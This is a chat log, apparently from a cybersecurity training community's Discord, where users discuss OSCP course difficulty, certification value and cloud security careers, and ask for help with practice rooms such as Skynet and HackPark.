And that's the important thing. Pushing yourself. No one is going to be around to hold your hand forever. Research is the most important skill we'll ever learn -- especially for pentesting: a job that literally requires you to know more than you can ever possibly know straight off
thank you for coming to our ted talk 
That ^^
W/e. It is a matter of opinion.
Not really, but sure
You can never give up, you can never surrender, fight the good fight til the end of the night and always remember
I am speechless
^ So, nope, it's not beginner level according to offsec
Weird.
^
I told offsec I had no experience and they sent that to people
Everyone is acting like PWK is beginner level just because they saw it online somewhere, but offsec says it's not
tryhackme is actually beginner level
^^ It requires a fairly decent knowledge level and the site says that when you go to sign up for the course
If I remember reading it correctly last week when I signed up
I always disagreed with people saying PWK is beginner level, because they literally just expect you to know from the start
they say it's entry level for their ecosystem iirc, not beginner level
Well they used the word entry level and said PWK is not that so?
@simple kestrel -- for the record, that is the official response from offsec ^^
Wait for a response to that. It might be necessary...
^
So what you're saying is I need to bribe g0tmi1k and Owen when I sit my exam
gotcha
oof
They won't take bribes
tbh I gotta spend some serious time on windows
The company has a pretty large legal dept, so you might get sued for even trying
I was joking π but hey
Man hasn't got the money to bribe
if I did I'd just hire an Indian guy on Fiverr
Mentioning the OSCP exam is sketchy to me, because cheating is considered 1st degree murder to them
^ I think that's where they earn most of their money
So it's threatening their livelihood if the cert's rep gets damaged.
they will literally sue you for a lot of money
OSWP isn't even proctored kekw
No one really cares about that cert anyway
OSWP was pretty fun tbh
just because you speedran it
only bc OffSec had some issues getting it set up
and because the challenges department got back to me 30 minutes into the real start of my exam
tbh you did speed run it
listen
Discord chat. Oh there's one flag, there's two, there's 3. Done
Amazon certs are worth a lot of money now
I've heard a lot more conversations surrounding Azure as of late though
AWS is 30% of the market and Azure is 16%
AWS is still way larger according to the market
i think cloud is one of the things that needs a lot more exposure in terms of testing
The security is often the job of the DevOps engineer
and that explains why there's a security concern of the cloud 
Depends
That's why the average salary is up to 100,000/year, because it's hard to find experts with cloud
fair point
Linux Academy is profiting from this
I love Linux Academy. Another great platform. I passed one of the AWS certs with flying colors just using that
Very hands on and quality material and teachers
I agree, I passed the LPIC1 because of them
Hey can I pm anyone for help with skynet? the exploit is not working properly
You can DM me if you'd like. On phone though so you'll probably have to send pics to refresh my memory
Hello everyone, I haven't enrolled yet to any paths but can someone tell me what the learning path looks like? if that's okay
learning path is basically a collection of rooms placed in a strict order so it would give you the right path of learning (so you wouldn't start with harder rooms or wouldn't feel lost)
@bronze zenith thanks for the reply, that sounds nice. is it only text or is there some video explanation
and thanks again for help
brb
path is rooms (which obviously have text walkthroughs (now even videos))
hey
hey could i pm anyone for help with 1 step of the hackpark
After 2 days I'm not able to escalate skynet. Never doing the same things on walkthrough
Any help?
I'm on the HackPark Question 4 of Task 4: I used run event_manager.rb -l system but not sure what I am looking for and nothing is standing out
yes same for me, i need help on that only @rotund carbon
I attempted my OSCP exam yesterday and it didn't go too well. I'm just not sure where to go from here.
I'm pretty sure, with a bit more experience you'll make it
guys is this the right place to ask for help re the OSCP-PATH and the vulnversity room?
@hard shoal take a week break, and use tryhackme VIP and virtualhackinglab. Don't despair, it's an easy test
@hoary hazel Yep it is. I did vulnversity, I can guide you with it. PM me if you want
I did most of the OSCP path on here. I don't know if I was overthinking stuff or what happened. I just flopped big time.
No one can guarantee that OSCP will give you enough knowledge to pass the oscp exam
it is a great way to expand your knowledge
Yeh for sure, I'm just not sure where to go from here. As I don't know if I missed stuff or I was trying the right thing in the wrong way.
Establish a process, I think that's important. And you can extrapolate later
Besides tryhackme, I like HTB VIP. Have you been there?
I had a process, just nothing worked as I expected lol, was not sure if I was over thinking stuff or just missing really obvious stuff. No I have not done HTB but have watched the recommended video from IPPsec on the OSCP path.
I like HTB VIP. I will recommend you the retired boxes
I've also enjoyed the OSCP path here. Some machines may be too easy for you, but it's a nice refresher.
Sure thanks, I just don't know where I need to improve. I think my Enum was fine but everything I tried didn't work so either I was overthinking stuff or missing something.
@hard shoal another great resource at a nice price : https://www.virtualhackinglabs.com
We also have a nice discord channel, I'm part of it. With a few people who have passed OSCP already
hello
I enrolled yesterday but I cannot find any videos or tutorials or so
All I see is questions
Pls where can I find tuts
@lilac frost not all rooms have videos yet :)
The first room did not have videos
Blue and nmap have videos, there are 2 more coming in the next day or so.
I am a complete beginner
okai, I would say wait 24 hours - there is a beginner room that is going to include a video
Will help you a lot.
In the mean time I'd suggest doing a Linux room
aii thanks
darkstar does have a good voice for it
@topaz yoke Now you see why :)
better than my redneck voice
o rly?
Mi mi mi mi mi mi
You interviewed me because I made machines for vulnhub
You're very british, that's what I remember